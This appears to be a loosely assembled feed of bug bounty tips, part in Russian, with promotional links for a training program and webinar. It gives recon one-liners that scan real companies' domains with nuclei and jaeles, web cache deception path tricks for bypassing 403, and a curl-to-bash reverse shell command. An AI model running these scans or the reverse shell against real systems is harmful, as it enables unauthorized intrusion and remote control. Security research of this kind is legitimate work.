Bug bounty Tips

Hey! After a long break, i am back with some BugBounty notes, on reconnaissance with the list of tools and Its technique. https://book.cipherops.tech/bug-bounty-notes/series-on-the-power-of-reconnaissance-tools

Don't Ignore wordpress websites :) Payload:

Fingerprinting with Shodan and Nuclei engine: > shodan domain tesla.com | awk '{print $3}' | httpx -silent | nuclei > shodan domain tesla.com | awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ > shodan search org:"google"  --fields ip_str,port --separator " " | awk '{print $1":"$2}' #bugbounty #bugbountytips

Иногда, если ответ «404 Not found», Akamai кэширует ответ менее чем на 10 секунд, что усложняет задачу. В этом случае злоумышленник должен быть быстрым. Однако, если Akamai обнаружит ответ 200 OK, он будет храниться не менее 24 часов. Совет: В некоторых приложениях, если вы добавите точку с запятой (;) перед расширением, это может дать вам ответ 200 OK. Например

/xxxx/xxxxxx/;.js?test
/xxxx/xxxxxx/;.css?test

или (обход 403 при попытке закешировать)

/xxxx/xxxxxx/;%2ejs?test
/xxxx/xxxxxx/;%2ecss?test

Мы получим HTTP/2 200 ОК и сохраним ответ в кэш на 24 часа.

curlshell reverse shell using curl * usage: * Start your listener: ./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234 On the remote side: curl https://curlshell:1234 | bash download #shell #curl

#bugbountytips Scan for s3 bucket takeover vulnerabilities > subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt

#bugbountytips 1. Finding More IDORs – Tips And Tricks ($100/Day) 2. How-i-found-XSS-on-admin-page-without-login? 3. Reconnaissance to Remote Code Execution 4. How I get +10 SQLi and +30 XSS via Automation Tool? 5. IDOR is Everywhere 😁 6. $300 for Reporting an Unexpected Bug 7. How I hacked one of the biggest airlines group in the world? 8. International company customer PII INFO by AWS metadata access through SSRF 9. I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection 10. I got owned a Multi-Billion Dollar Retailer’s MySQL using SQL Injection

Guys check out this training and internship program if anyone intrested in do register the for below link. https://forms.gle/vr77U7P5REZdDPB37

Check out this guy's we have update our training and internship program on our official website. ➡️Cipherops.tech

If anyone intrested in joining the webinar, do join at sharp 6 PM Webinar link for “unlocking the secrets of Bug Bounty” meet.google.com/rbp-bwsh-mbb